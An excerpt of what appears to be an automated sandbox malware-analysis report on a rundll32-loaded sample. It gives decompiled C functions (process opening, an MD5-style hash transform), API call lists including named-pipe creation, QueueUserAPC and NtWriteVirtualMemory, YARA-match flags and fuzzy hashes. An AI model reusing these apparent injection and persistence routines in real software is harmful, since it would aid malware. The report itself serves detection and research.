                            • Part of subcall function 05B77950: RtlNtStatusToDosError.NTDLL(00000000), ref: 05B77988
                            • Part of subcall function 05B77950: SetLastError.KERNEL32(00000000), ref: 05B7798F
                          • GetLastError.KERNEL32(?,00000318,00000008), ref: 05B7EBF7
                            • Part of subcall function 05B636BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 05B636D3
                          • memcpy.NTDLL(00000218,05B838A0,00000100,?,00010003,?,?,00000318,00000008), ref: 05B7EB76
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05B7EBD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                          • String ID:
                          • API String ID: 2966525677-3916222277
                          • Opcode ID: e26b40ba1b623cd9b24f1d6cd11f6f190ee6f775ea62ed7e604f76376e8335ec
                          • Instruction ID: de5eb73b6b8a31726931d03c2b1a6e909232c55f2f15cf7c609173b10206a307
                          • Opcode Fuzzy Hash: e26b40ba1b623cd9b24f1d6cd11f6f190ee6f775ea62ed7e604f76376e8335ec
                          • Instruction Fuzzy Hash: 64313075A01209AFDB20DF64D9C9AAABBB9FF04214F1049EAE556D7240DB30FA48CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7D7F1 Relevance: 7.9, APIs: 6, Instructions: 401COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: 4b703edb592c745c2d46ad4fdd38d3a6257b7eb6a24955c6a88058c7cd1090c8
                          • Instruction ID: b186cb6ce198df9168d15b5ecaa89cff6892fc585d0a78bac49d1e18007971f1
                          • Opcode Fuzzy Hash: 4b703edb592c745c2d46ad4fdd38d3a6257b7eb6a24955c6a88058c7cd1090c8
                          • Instruction Fuzzy Hash: 18F1DF70604B99DFCB31CF68C988AAABBF4FF51340F2449ADC5E796681D231BA45CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01006D78 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01006D78(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x100a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x100a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x100a2f8 = _t6;
					 *0x100a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x100a2f4 = _t7;
					if(_t7 == 0) {
						 *0x100a2f4 =  *0x100a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                          0x01006d80
                          0x01006d86
                          0x01006d8d
                          0x00000000
                          0x01006de7
                          0x01006d8f
                          0x01006d97
                          0x01006da4
                          0x01006da4
                          0x01006de4
                          0x00000000
                          0x01006de4
                          0x01006da6
                          0x01006da6
                          0x01006dab
                          0x01006dbd
                          0x01006dc2
                          0x01006dc8
                          0x01006dce
                          0x01006dd5
                          0x01006dd7
                          0x01006dd7
                          0x00000000
                          0x01006dde
                          0x01006da0
                          0x00000000
                          0x00000000
                          0x01006da2
                          0x00000000

                          APIs
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01001D07,?), ref: 01006D80
                          • GetVersion.KERNEL32 ref: 01006D8F
                          • GetCurrentProcessId.KERNEL32 ref: 01006DAB
                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01006DC8
                          • GetLastError.KERNEL32 ref: 01006DE7
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                          • String ID:
                          • API String ID: 2270775618-0
                          • Opcode ID: d57e7d6be501c48533432e5bc6198a1f561b7562b795e275567c9732c8e43910
                          • Instruction ID: 3f8ff2eb3ffaa9e4078ef68cc8378422602804376b841a8f8aa4773ec3b296d8
                          • Opcode Fuzzy Hash: d57e7d6be501c48533432e5bc6198a1f561b7562b795e275567c9732c8e43910
                          • Instruction Fuzzy Hash: D3F03170A40302DFEB77BB289919B153BA2AB44745F104536F6D6CB1C9D7BB8090CB15
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6D77A Relevance: 6.1, APIs: 4, Instructions: 114stringnativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 05B6D7D0
                          • lstrlenW.KERNEL32(?), ref: 05B6D7DE
                          • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 05B6D809
                          • lstrcpyW.KERNEL32(00000006,00000000), ref: 05B6D837
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Query$lstrcpylstrlen
                          • String ID:
                          • API String ID: 3961825720-0
                          • Opcode ID: af8654d802c0de586bfce39338f22d91be2e89cb6203660c35535930690af4e5
                          • Instruction ID: 29842fffa99c70af388f56d74be4a59809279f5c1e98b4e7a0b8baca20e4c3ed
                          • Opcode Fuzzy Hash: af8654d802c0de586bfce39338f22d91be2e89cb6203660c35535930690af4e5
                          • Instruction Fuzzy Hash: 62410872610209EFDF119FA4C989ABEBBA9FF44314F1040A9F906A7250DB79FA11DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B781F1 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,05B8A1E8,00000001), ref: 05B78215
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78260
                            • Part of subcall function 05B773AA: CreateThread.KERNEL32(00000000,00000000,00000000,05B7893A,05B8A174,05B80998), ref: 05B773C1
                            • Part of subcall function 05B773AA: QueueUserAPC.KERNEL32(05B7893A,00000000,?,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773D6
                            • Part of subcall function 05B773AA: GetLastError.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773E1
                            • Part of subcall function 05B773AA: TerminateThread.KERNEL32(00000000,00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773EB
                            • Part of subcall function 05B773AA: CloseHandle.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773F2
                            • Part of subcall function 05B773AA: SetLastError.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773FB
                          • GetLastError.KERNEL32(05B71FE9,00000000,00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78248
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78258
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                          • String ID:
                          • API String ID: 1700061692-0
                          • Opcode ID: 086ad2b176c3e2001a66fb9487d92c2b580748f2125e7004ad7ff5f94b6d8ec8
                          • Instruction ID: b3cdaef7d5d3ecd840ee522ef1b8801757aadbd9954e2a241626e4550545b4c2
                          • Opcode Fuzzy Hash: 086ad2b176c3e2001a66fb9487d92c2b580748f2125e7004ad7ff5f94b6d8ec8
                          • Instruction Fuzzy Hash: 52F08171349205AFE3216AA89C89A362A69EB46231B241275F936D32D0DA707C05C6B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6B7D5 Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 05B6B7E9
                          • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 05B6B829
                            • Part of subcall function 05B75312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,05B7907F,?,00000004,00000000,00000004,?), ref: 05B75330
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05B6B832
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                          • String ID:
                          • API String ID: 4036914670-0
                          • Opcode ID: bf0215445f111c69eea2ddefa599785bae65a215e02cfe08861ab91a55a2bfad
                          • Instruction ID: 9ae1201c29d69791fb40f53f1d94ea55337aefce9c75beb0f6ad732067a19684
                          • Opcode Fuzzy Hash: bf0215445f111c69eea2ddefa599785bae65a215e02cfe08861ab91a55a2bfad
                          • Instruction Fuzzy Hash: BE01AC76A40108FBEB11AA95ED45DFEBBBEFB84700F500065F951E2150EB75E904DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B73829 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 05B7385A
                          • RtlNtStatusToDosError.NTDLL(C000009A), ref: 05B73891
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorFreeHeapInformationQueryStatusSystem
                          • String ID:
                          • API String ID: 2533303245-0
                          • Opcode ID: 5a1091e6b4f55ca940a7091aed8097435a8711bc8e19e10fb579cff52bcad7a7
                          • Instruction ID: cc621f9dc2629a563323bdcbb8c82c802fc825180b380f4aa4985ea7d2b9d992
                          • Opcode Fuzzy Hash: 5a1091e6b4f55ca940a7091aed8097435a8711bc8e19e10fb579cff52bcad7a7
                          • Instruction Fuzzy Hash: F1018677916128BBD7219A55890CABFBAAAEF85B50F1505A4FD2263100EB70FA00A7D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B664C4 Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B664E3
                          • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 05B664FB
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InformationProcessQuerymemset
                          • String ID:
                          • API String ID: 2040988606-0
                          • Opcode ID: 75a299bdc2980ef934016034665bb6ee4d7e0a100d0978e410371a27165652fc
                          • Instruction ID: c0fd734a2dc7f0a0107ec2f5bec21675014af8839a1d968231e74b363e6dc342
                          • Opcode Fuzzy Hash: 75a299bdc2980ef934016034665bb6ee4d7e0a100d0978e410371a27165652fc
                          • Instruction Fuzzy Hash: F6F0F476A0022C7BDB20DA91DC49FDE7F6CEB04740F4040A1AA14E6191E774EB558BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B75220 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 05B7524D
                          • SetLastError.KERNEL32(00000000,?,05B6C670,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 05B75254
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$LastStatus
                          • String ID:
                          • API String ID: 4076355890-0
                          • Opcode ID: b42336272489118eef4c2083df06edeed8b540131cfd17be9cb7125c48361805
                          • Instruction ID: 37cda74d3ebc3db1a8eb0cd116d048402275d016e2e1ff805d2095845a152bb5
                          • Opcode Fuzzy Hash: b42336272489118eef4c2083df06edeed8b540131cfd17be9cb7125c48361805
                          • Instruction Fuzzy Hash: 0EE09A3261421EBBDF225EE89C05DAE7F6AEB0C791B009051BE25D6160DB31F921DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7FF4D Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B80327
                          • memset.NTDLL ref: 05B80336
                            • Part of subcall function 05B68E0C: memset.NTDLL ref: 05B68E1D
                            • Part of subcall function 05B68E0C: memset.NTDLL ref: 05B68E29
                            • Part of subcall function 05B68E0C: memset.NTDLL ref: 05B68E54
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                          • Instruction ID: 257e4f2ef5a989a3d0da27357c58d66419c0fa0c03d56d4655b4bc965c3bc099
                          • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                          • Instruction Fuzzy Hash: 00024170501B298FC775EF29C698927B7F1FF446607206E6ED6E786A90E231F489CB04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7154D Relevance: 1.9, APIs: 1, Instructions: 611COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                          • Instruction ID: 57420318e8dc3f9e2b6a936c73655e96b9d80533c049bce1c3d1093a4540e590
                          • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                          • Instruction Fuzzy Hash: 1622847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01004BF1 Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 49%
                          			E01004BF1(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                          0x01004bf4
                          0x01004bff
                          0x01004c02
                          0x01004c05
                          0x01004c06
                          0x01004c24
                          0x01004c26
                          0x01004c29
                          0x01004c2c
                          0x01004c2c
                          0x01004c2f
                          0x01004c2f
                          0x01004c32
                          0x01004c32
                          0x01004c35
                          0x01004c35
                          0x01004c52
                          0x01004c55
                          0x01004c6b
                          0x01004c6e
                          0x01004c88
                          0x01004c8b
                          0x01004ca1
                          0x01004ca4
                          0x01004ca6
                          0x01004cbe
                          0x01004cc1
                          0x01004cc4
                          0x01004cdc
                          0x01004cdf
                          0x01004cf9
                          0x01004cfc
                          0x01004d12
                          0x01004d15
                          0x01004d17
                          0x01004d2f
                          0x01004d34
                          0x01004d37
                          0x01004d4d
                          0x01004d50
                          0x01004d6a
                          0x01004d6d
                          0x01004d83
                          0x01004d86
                          0x01004d88
                          0x01004da3
                          0x01004da6
                          0x01004dbd
                          0x01004dc0
                          0x01004dc4
                          0x01004ddd
                          0x01004de0
                          0x01004de2
                          0x01004de5
                          0x01004e00
                          0x01004e03
                          0x01004e1c
